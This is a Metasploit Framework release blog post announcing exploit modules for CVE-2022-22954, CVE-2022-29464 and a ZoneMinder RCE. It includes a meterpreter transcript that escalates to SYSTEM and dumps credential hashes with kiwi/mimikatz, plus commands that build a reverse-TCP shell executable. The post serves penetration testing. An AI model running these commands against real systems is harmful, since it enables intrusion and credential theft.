Last updated at Fri, 06 May 2022 17:56:15 GMT
VMware Workspace ONE Access RCE
Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis
WSO2 Arbitrary File Upload to RCE
Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a
java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis
Kiwi Meterpreter Updates - Windows 11 Support
The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the
creds_all command within a Meterpreter console:
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > load kiwi Loading extension kiwi… .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( firstname.lastname@example.org ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( email@example.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > sysinfo Computer : WIN11-TEST OS : Windows 10 (10.0 Build 22000). Architecture : x64 System Language : en_US Domain : TESTINGDOMAIN Logged On Users : 11 Meterpreter : x64/windows meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- WIN11-TEST$ TESTINGDOMAIN a133becebb8e22321dbf26bf8d90f398 dbf0ad587f62004306f435903fb3a516da6ba104 ... etc etc ...
New module content (3)
- VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954 - This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.
- WSO2 Arbitrary File Upload to RCE by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits CVE-2022-29464 - This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
- ZoneMinder Language Settings Remote Code Execution by krastanoel, which exploits CVE-2022-29806 - This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the
Enhancements and features (2)
- #16445 from dwelch-r7 - The Windows Meterpreter payload now supports a
MeterpreterDebugLoggingdatastore option for logging debug information to a file. Example usage:
use windows/x64/meterpreter_reverse_tcp set MeterpreterDebugBuild true set MeterpreterDebugLogging rpath:C:/test/foo.txt save generate -f exe -o shell.exe to_handler
Bugs fixed (2)
- #16526 from jheysel-r7 - The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
- #16530 from sjanusz-r7 - This updates the
pihole_remove_commands_lpemodule to no longer break sessions when running the check method.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).